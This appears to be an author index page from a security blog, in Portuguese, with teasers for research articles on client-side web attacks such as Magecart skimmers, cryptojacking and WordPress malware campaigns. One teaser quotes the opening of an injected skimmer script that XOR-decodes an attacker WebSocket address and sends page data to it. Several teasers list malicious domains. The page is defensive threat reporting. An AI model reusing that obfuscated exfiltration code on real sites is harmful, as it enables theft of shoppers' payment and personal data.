Articles by Himanshu Anand
CryptoJacking está morto: viva o CryptoJacking
O cryptojacking moderno evoluiu para ataques silenciosos e de múltiplos estágios.
Magecart mirando sites de e-commerce do Leste Asiático no OpenCart
Detectamos um ataque no estilo Magecart direcionado à plataforma de CMS OpenCart
Sequestro de afiliados e sequestro de tráfego: como scripts de fraude redirecionam utilizadores
O sequestro de afiliados rouba comissões de duas formas: a fraude de lances em SERP interceta antes do clique e scripts reescrevem a atribuição.
Depender de Indicadores de Comprometimento é suficiente para sua segurança?
A maioria dos programas de segurança ainda depende fortemente de Indicadores de Comprometimento (IOCs). Essa abordagem falha em detectar ameaças que evoluem lentamente, reutilizam infraestrutura ou operam em contextos restritos e de alto valor, como o web skimming no lado do cliente.
Ataque Client-Side ao CoinMarketCap: Uma Análise Completa
Em 20 de junho de 2025, o CoinMarketCap (CMC), uma importante plataforma de dados cripto em tempo real, sofreu um incidente de segurança client-side.
Google OAuth Armado Dispara WebSocket Malicioso
Um atacante está a usar o 'Google.com' para entregar e executar o seu próprio código num ataque armado ao Google OAuth.
Ataques Implacáveis do Lado do Cliente a Visar Múltiplas Plataformas com o ClickFix
Neste artigo, analisamos uma variante recente do ClickFix que agora visa macOS, Android e iOS, recorrendo a redirecionamentos baseados no navegador, alertas de interface falsos e até técnicas de download drive-by.
Golpe Adulto Chinês Visa Utilizadores Móveis Através de PWA
Identificámos uma nova campanha de injeção que abusa de JavaScript de terceiros para redirecionar utilizadores.
Mais de 150 mil sites afetados por sequestro de página inteira com links para sites de apostas chineses
Estimamos que aproximadamente 150.000 sites foram afetados por esta campanha. O script define um array de palavras-chave relacionadas com apostas, jogos de azar e marcas de casino em inglês e em chinês.
Milhares de sites atingidos por quatro backdoors num ataque a JavaScript de terceiros
Ao analisar ameaças direcionadas a frameworks WordPress, encontrámos um ataque em que um único ficheiro JavaScript de terceiros foi utilizado para injetar quatro backdoors separados em 1.000 sites comprometidos através de cdn.csyndication[.]com/.
Mais de 35.000 Sites Visados num Sequestro de Página Inteira Associado a um Golpe de Apostas em Língua Chinesa
Uma nova campanha de malware comprometeu mais de 35.000 sites, injetando um script malicioso a partir dos sites listados abaixo. Assim que o script é carregado, sequestra completamente a janela do navegador do utilizador, redirecionando-o frequentemente para páginas que promovem uma plataforma de apostas (ou casino) em língua chinesa.
10.000 Sites WordPress Encontrados a Distribuir Malware para MacOS e Windows
Identificámos mais de 10.000 sites WordPress a exibir uma falsa página de atualização do navegador Google que leva a downloads de malware.
Sites governamentais e universitários alvos de ataque client-side ScriptAPI[.]dev
Ontem descobrimos outro ataque JavaScript client-side visando +500 sites, incluindo governos e universidades. Os scripts injetados criam links ocultos no Document Object Model (DOM), apontando para sites externos, uma interface de programação para documentos web.
O custo dos falsos positivos - como nos tornámos um alvo
Esta semana, identificámos um caso de uso interessante envolvendo o ataque WP3[.]XYZ. Isto despertou o interesse de toda a comunidade e levou a melhores taxas de deteção em plataformas como o VirusTotal. Embora a maioria tenha apreciado os nossos esforços, outros criticaram-nos por não identificarmos a causa raiz ou recomendarmos serviços para limpar sites comprometidos. Continuamos a querer manter a comunidade consciente de ataques como este e a fazer melhor a cada vez.
Mais de 5,000 sites WordPress apanhados em ataque de malware WP3[.]XYZ
Descobrimos uma campanha de malware generalizada que visa sites WordPress, afetando mais de 5,000 sites a nível mundial. O domínio malicioso: "https://wp3.xyz/plugin[.]php".
Novo ataque de script JS de terceiros encontrado: Artifyau[.]com e Quantifymy[.]com
Esta semana, implementámos um crawler especializado para fins de investigação. Em apenas 24 horas, identificou novos padrões de ataque Magecart. O Magecart é uma ameaça sofisticada e financeiramente motivada que injeta JavaScript malicioso para roubar informações pessoais de pagamento. Aqui está uma lista dos maiores ataques Magecart até agora. Deteção inicial: JavaScript ofuscado em Artifyau[.]com URL detetado: https://artifyau[.]com/T1M0dVluVnBiR1J6YVhSbGNISnZMbU52YlE9PQ/jqwery.js. O URL imita um
Novo código de ataque Magecart revelado
No dia 14 de outubro, publicámos um artigo sobre como mais um ataque Magecart ao Magento estava a acontecer. Na altura, identificámos apenas um script como responsável. Hoje, conseguimos encontrar e analisar o ataque com mais detalhe. O ataque decodificado Este foi o código injetado: <script> const qbq = [93,89,89,16,5,5,77,89,94,75,94,70,73,4,69,88,77,5,64,67,92,69,21,89,69,95,88,73,79,23]; const zep = 42; window.sss = new WebSocket(String.fromCharCode(...qbq.map(hwo => hwo ^ zep)) + encodeURIComponent(location.h
Site de e-commerce do Kuwait está a ser utilizado para facilitar ataques de client-side skimming
Um site de e-commerce popular no Kuwait, que utiliza uma versão desatualizada do Magento (2.4), foi comprometido por uma injeção de JavaScript malicioso,
Ataque JavaScript Magecart client-side na Cisco
Mais um dia, mais um ataque JavaScript client-side de alto perfil. Esta manhã, lemos que a Cisco é a próxima vítima de código malicioso a ser
Ataque à cadeia de abastecimento web através de jQuery trojanizado no npm, GitHub e CDNs
Foram encontrados ataques em jQuery trojanizado no GitHub, npm e jsDelivr num novo ataque à cadeia de abastecimento web. Cada pacote tinha uma cópia do jQuery